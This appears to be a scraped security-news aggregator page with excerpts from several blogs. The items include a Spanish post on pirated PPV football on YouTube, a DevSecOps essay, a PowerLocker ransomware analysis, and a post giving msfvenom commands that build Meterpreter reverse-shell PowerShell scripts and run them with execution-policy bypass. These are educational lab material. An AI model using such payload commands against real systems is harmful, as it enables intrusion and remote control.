Feed aggregator

<div class="feedflare">

Room362.com - 48 min 8 sec ago
Categories: Security Posts

about

Room362.com - 48 min 8 sec ago
Mubix “Rob” Fuller Rob has over 11 years of experience covering all facets of information security. He has been behind the lines helping to design, build, and defend the US Marine Corps, US Senate, and Pentagon networks - as well as performing penetration tests and Red Team assessments against those same networks. More recently, Rob has performed numerous successful Red Team assessments against commercial Fortune 50 companies representing some of the best defensive teams in the industry.
Categories: Security Posts

Infocon: green

ISC Stormcast For Friday, August 18th 2017 https://isc.sans.edu/podcastdetail.html?id=5632
Categories: Security Posts

ISC Stormcast For Friday, August 18th 2017 https://isc.sans.edu/podcastdetail.html&#x3f;id=5632, (Fri, Aug 18th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts

In-Directo: Canales de Youtubers emiten los partidos de fútbol PPV en Live Streaming

Un informático en el lado del mal - Thu, 2017/08/17 - 19:28
Ayer no me dio la vida para ver la vuelta de la SuperCopa de España. Vi unos minutos nada más y el trajín de vida que me tiene en París hizo que cayera rendido con el ordenador en el pecho. Sin embargo, me dio tiempo a descubrir lo fácil que es para cualquiera acceder a contenidos de emisión en directo - como un partido de fútbol PPV a través de los servicios de Google.
Figura 1: In-Directo: Canales de Youtubers emiten los
partidos de fútbol PPV en Live Streaming
Tiempo atrás ya os dejé un post que generó bastante polémica en algunos lugares, sobre lo fácil que era encontrar películas piratas en Youtube y cómo los sistemas de Google no estaban funcionando tan adecuadamente en la detección del contenido pirata, generándose efectos secundarios, cuanto menos, "curiosos".
En este caso, cuando los derechos del fútbol tienen un coste de adquisición exorbitante por medio de las plataformas de distribución de contenido, como las televisiones de pago, llama poderosamente la atención lo sencillo que es para cualquiera acceder a través de Google y YouTube, a ver casi cualquier partido. 
Figura 2: Partidos que han comenzado a las 19:00 en PPV de la Europe League
Ahora mismo, mientras espero para terminar mi viaje, he hecho un pequeño experimento, esperando a que comiencen los partidos de las 19:00 de la Europa League. En la web, se puede ver que el contenido de estos partidos es en PPV (Pago Por Visión).
Figura 3: D.Zagreb contra Skënderbeu
Basta con ir a Google y buscar vídeos "recientes" con Live Streaming del partido que se quiera buscar. Como podemos ver, ya hay varios canales esperando para emitir en director el partido que queremos ver. Muchos son solo vídeos que en la descripción te llevan a servicios web de dudosa legalidad y no emiten el partido por Youtube realmente.
Figura 4: Canales que "supuestamente" emiten el futbol PPV en directo desde Youtube
Pero entre ellos, hay algunos que sí que lo emiten, y llegada la hora, el partido comienza en el Canal Youtube, como estaba anunciado, y se puede ver.
Figura 5: El partido en directo vía YouTube, a pesar de ser PPV
La experiencia que he tenido haciendo pruebas dice que a veces, como a los 20 minutos o así, aparecen reclamaciones del dueño del contenido que tiene que estar proactivamente buscándolos en estas plataformas que ofrecen Live Streaming de vídeo. Pero con repetir el proceso, aparecen nuevos canales que están preparados para cuando caigan los primeros.
La pregunta que queda en el aire es la misma que hay con servicios en Internet que almacenan contenido pirateado. ¿Deben hacer más? ¿Deben ser los dueños del contenido los que se quejen a las plataformas? ¿Se puede automatizar esto de una mejor manera que ir denunciando canal a canal en los servicios de Live Streaming la emisión del contenido pirateado? ¿Se puede hacer más? 
Saludos Malignos!

PD: Esto sucede en otras plataformas de que emiten Live Streaming Vídeo, aunque para el ejemplo se ha utilizado Youtube y Google.
Sigue Un informático en el lado del mal - Google+ RSS 0xWord
Categories: Security Posts

Don't Be AppSec 'Helicopter Parents'

Zero in a bit - Thu, 2017/08/17 - 16:55
Roles shifting can be disconcerting. Having a clear role and understanding your responsibilities and tasks is comforting. But getting too comfortable can be dangerous. Take parenting for example. Parents wouldn’t be doing their kids any favors by continuing to feed and dress them as if they were 4 when they’re 10. As children age, they start to do these basic tasks on their own, and the parent role shifts to one of enabler – helping and guiding children as they do these tasks for themselves. This shift leaves the parents free to focus on more “value-add” type activities, such as homework and social activities. Similarly, most people find their role in the workplace changing as their career advances. For instance, the shift from individual contributor to manager accompanies a shift from doing to enabling. Just as parents stop doing everything for their kids and start enabling kids to do things for themselves, managers need to stop doing all the work, and enabling and guiding their team to do the work. This is not an easy transition, and one many never fully make (think “helicopter parenting,” empty nesters feeling lost and depressed, or micromanaging bosses). But in the end, not making it does more harm than good – in child rearing, the workplace … and even application security. Security Role Change With the shift to DevSecOps, security professionals are undergoing a shift in their role in the development process. Security’s role in AppSec is shifting from one of “do-er” to enabler. Just as kids growing and maturing changes the landscape and forces a shift in roles, changing and maturing software development is instigating a role shift as well. In this new landscape, the security team is no longer doing the security testing, but enabling developers to do the testing. And just as with raising children or managing a team, neglecting to embrace this shift will harm both the process and the individual. Why the Shift? With the number of applications exploding and the pace of development rapidly intensifying, traditional application security methods are no longer able to keep up. Security teams conducting their testing after the development process, then sending results back to the dev teams to address them is simply not feasible in today’s fast-paced environment. Today, security needs to shift left and be addressed early and often as part of the development process. Modern application security programs feature centralized governance by security, but testing and fixing are owned by development in an automated fashion throughout the build process. In this approach, security owns setting policies, tracking KPIs and providing security coaching to developers.  In addition, security is responsible for providing developers with support in integrating scalable tools like Veracode into their SDLC. Developers own testing applications in their development environment, fixing flaws to pass policy and continuing to build code. In this process, security-related defects are just another bug during the build process, and developers have the tools and guidance needed to fix them. At the same time, security can govern the program to make sure KPIs and policies are met. DevSecOps is going to be a disruptive force for security professionals. But it’s also a positive shift, creating an opportunity to greatly improve application security, and allowing the security team to focus on more value-added tasks and initiatives like governance and coaching. As with most life changes, the key is to understand the change and its implications on your role and be prepared to not only survive it, but thrive in it. Change is never easy, but failing to adapt will inevitably hold you and those around you back. Get best practices for working in this new development environment in The Security Professional’s Role in a DevSecOps World.
Categories: Security Posts

[SANS ISC] Maldoc with auto-updated link

/dev/random - Thu, 2017/08/17 - 12:53
I published the following diary on isc.sans.org: “Maldoc with auto-updated link“. Yesterday, while hunting, I found another malicious document that (ab)used a Microsoft Word feature: auto-update of links. This feature is enabled by default for any newly created document (that was the case for my Word 2016 version). If you add links to external resources like URLs, Word will automatically update them without any warning or prompt… [Read more] [The post [SANS ISC] Maldoc with auto-updated link has been first published on /dev/random]
Categories: Security Posts

Generating PowerShell Scripts With MSFVenom On Windows

Didier Stevens - Wed, 2017/08/16 - 22:46
To generate a PowerShell script with msfvenom on Windows, use the command “msfvenom.bat –payload windows/x64/meterpreter_reverse_http –format psh –out meterpreter-64.ps1 LHOST=127.0.0.1”: The payload windows/x64/meterpreter_reverse_http is the Meterpreter payload for 64-bit Windows. Format psh is the format to use to generate a PowerShell script that will execute the payload (formats ps1 and powershell are transform formats, they do not generate a script that executes the payload). A 32-bit payload is generated with this command “msfvenom.bat –payload windows/meterpreter_reverse_http –format psh –out meterpreter-32.ps1 LHOST=127.0.0.1”: Just as I showed in my post for .exe payloads, we start a handler like this: Now we need to execute the PowerShell scripts. Just executing “powershell.exe -File meterpreter-64.ps1” will not work: By default, .ps1 files are not executed. We can execute them by bypassing the policy “powershell.exe -ExecutionPolicy Bypass -File meterpreter-64.ps1”: In this example, 948 is the handle to the thread created by CreateThread when the payload is executed. But back in the Metasploit console, you will not see a connection. That’s because the PowerShell process terminates before the Meterpreter payload can fully execute: powershell.exe executes the script, which loads the Meterpreter payload in the powershell process, and then powershell.exe exits, e.g. the powershell process is terminated and thus the Meterpreter payload too. To give the Meterpreter payload the time to establish a connection, the powershell process must remain alive. We can do this by preventing powershell.exe to exit with option -NoExit: Now we get a connection: This example was for a 64-bit payload on a 64-bit Windows machine. The same command is used to execute the 32-bit payload on a 32-bit Windows machine (except for the filename, which is meterpreter-32.ps1 in our example). To execute the 32-bit payload on a 64-bit Windows machine, we need to start 32-bit PowerShell, like this “c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoExit -File meterpreter-32.ps1”: This gives us 2 sessions:
Categories: Security Posts

LaCon2k17 Call for Pulpos

48Bits Blog - Sat, 2017/08/12 - 10:32
We are proud to present the call for papers for LaCon 2017!, get your papers in now. We are accepting short talks of 30min and long talks of ~1h. [when] conf will be held from the 22nd to the 24th of Sept 2017 [where] undisclosed location [who] a bunch of crazy bastards [topics] topics include:
  • h/p/v/c/e …
  • satellites, antennas and radioactive crap
  • cryptocurrencies
  • knitting
  • radare3, radare2 talks won’t be accepted this year, for radare2 related topics consider attending r2con
  • cats
  • 8===========D
[submit] submit your talk proposals to lacon2k17.org@lists.48bits.com [gpgkey] gpg –keyserver pgp.mit.edu –recv-key 2BE9CA85
Categories: Security Posts

Join Fortinet at HPE Discover 2017!

Fortinet FortiGuard Blog - Mon, 2017/06/05 - 17:22
Fortinet is a Gold sponsor at Discover 2017, and will showcase several important security innovations to help you stay ahead of cyber threats. Join Fortinet at booth 231 while you’re at Discover 2017 to see a demo of the Fortinet Security Fabric in action! We’ll also have technical experts on hand to discuss any security needs you ma A key focus area for many attendees will be cybersecurity, given the challenges they face from today’s sophisticated and rapidly evolving threats. The isolated, proprietary security devices most organizations...
Categories: Security Posts

Governmental Entities Bringing Financial Cybersecurity to Center Stage

Fortinet FortiGuard Blog - Mon, 2017/06/05 - 17:20
By now, it’s no secret that cybercriminals have targeted, and continue to target, the financial services industry with advanced attacks that are designed to steal or otherwise jeopardize valuable data. As a result, many organizations have taken at least some initial steps to better secure their networks and the information that lives within them. In fact, according to Duff & Phelps’ “Global Regulatory Outlook,” 86 percent of professionals in the financial services industry say their companies have plans to put more...
Categories: Security Posts

An Inside Look at CVE-2017-0199 – HTA and Scriptlet File Handler Vulnerability

Fortinet FortiGuard Blog - Mon, 2017/06/05 - 03:52
FortiGuard Labs recently came across a new strain of samples exploiting the CVE-2017-0199 vulnerability. This vulnerability was fixed by Microsoft and the patch was released in April 2017. Due to its simplicity, it can be easily exploited by attackers. It has also been found in-the-wild by other vendors. We have also blogged about some samples recently found in spear phishing attack. While there are plenty of articles discussing this vulnerability, most of them are intended for technical readers and primarily focus on how to create proof-of-concept...
Categories: Security Posts

Support my videos on Patreon!

Niels Provos - Sun, 2017/05/28 - 01:18

Add your support on Patreon to help me create more videos. Your support will help with materials, rent as well as other equipment, e.g. cameras, lights, software, etc. It is not required but appreciated. Due to time constraints I can make no promises on how often I will be able to publish new videos but my plan is to continue producing videos as long as people find them interesting.
Categories: Security Posts

A Scheme to Encrypt the Entire Web Is Actually Working

Wired: Threat Level - Thu, 2016/04/14 - 13:00
The non-profit certificate authority Let's Encrypt is enabling a sea change toward HTTPS encryption online. The post A Scheme to Encrypt the Entire Web Is Actually Working appeared first on WIRED.









Categories: Security Posts

Matthew Keys Sentenced to Two Years for Aiding Anonymous

Wired: Threat Level - Wed, 2016/04/13 - 23:30
The former Tribune Company employee was convicted of giving Anonymous information that helped hackers access an LA Times server and alter a headline. The post Matthew Keys Sentenced to Two Years for Aiding Anonymous appeared first on WIRED.









Categories: Security Posts

Hacker Lexicon: What Are White Hat, Gray Hat, and Black Hat Hackers?

Wired: Threat Level - Wed, 2016/04/13 - 23:03
Here's how to distinguish the colors of the hacker rainbow. The post Hacker Lexicon: What Are White Hat, Gray Hat, and Black Hat Hackers? appeared first on WIRED.









Categories: Security Posts

PowerLocker

PandaLabs - Wed, 2014/03/05 - 10:53
PowerLocker, also called PrisonLocker, is a new family of ransomware which in addition to encrypting files on the victim’s computer (as with other such malware) threatens to block users’ computers until they pay a ransom (like the ‘Police virus’). Although the idea of ​​combining the two techniques may have caused more than a few sleepless nights, in this case the malware is just a prototype. During its development, the malware creator has been posting on blogs and forums describing the progress and explaining the different techniques included in the code. The malware creator’s message in pastebin In this post for example, the creator describes how PowerLocker is a ransomware written in c/c++ which encrypts files on infected computers and locks the screen, asking for a ransom. The malware encrypts the files, which is typical of this type of malware, using Blowfish as an encryption algorithm with a unique key for each encrypted file. It stores each unique key generated with an RSA-2048 public/private key algorithm, so only the holder of the private key can decrypt all the files. Also, according to the creator, PowerLocker uses anti-debugging, anti-sandbox and anti-VM features as well as disabling tools like the task manager, registry editor or the command line window. However, all the publicity surrounding PowerLocker that the creator has been generating across forums and blogs before releasing it, has led to his arrest in Florida, USA. Consequently, today there is no definitive version of this malware and there is no evidence that it is in-the-wild. Nevertheless, we still feel it’s worth analyzing the current version of PowerLocker, as someone else could be in possession of the source code or even a later version.   PowerLocker analysis The first thing PowerLocker does is to check whether two files with RSA keys are already created, and if not, it generates the public and private key in two files on the disk (pubkey.bin and privkey.bin). Unlike other ransomware specimens, which use the Windows CrytoAPI service, PowerLocker uses the openssl library for generating keys and encrypting files. Once it has the keys, PowerLocker runs a recursive search of directories looking for files to encrypt, excluding, not very effectively, files with any of the file names used by the malware: privkey.bin, pubkey.bin, countdown.txt, cryptedcount.txt. It also avoids $recycle.bin, .rans, .exe, .dll, .ini, .vxd or .drv files to prevent causing irreparable damage to the computer. The creator has however forgotten to exclude certain extensions corresponding to files which are delicate enough to affect the functionality of the system, such as .sys files. This means that any computer infected with PowerLocker would be unable to reboot. Moreover, in this version it is possible to use a parameter to control whether the ransomware encrypts or decrypts files using the pubkey.bin and privkey.bin keys generated when it was first run. This version does not include the screen lock feature described by the creator, although it displays a console with debug messages, names of the files to encrypt/decrypt, etc. and asks you to press a key before each encryption or decryption.   Conclusions At present, there is only a half-finished version of PowerLocker which could practically be labelled harmless, and which lacks many of the most important features that the creator has described on the forums and blogs, such as anti-debugging, screen locking, etc. Despite it not being fully functional we would recommend having a system for backing up critical files, not just to offer assurance in the event of hardware problems, but also to mitigate the damage of these types of malware infections. Also bear in mind that if you don’t have a backup system and your system is infected, we certainly do not recommend paying the ransom, as this only serves to encourage the perpetrators of such crimes. PowerLocker analysis performed by Javier Vicente
Categories: Security Posts

Redirecting...

Redirecting...

April 2013 Super Tuesday

April 2013 Super Tuesday

IBM X-Force 2012 Annual Trend &amp; Risk report has released!

IBM X-Force 2012 Annual Trend &amp; Risk report has released!
Syndicate content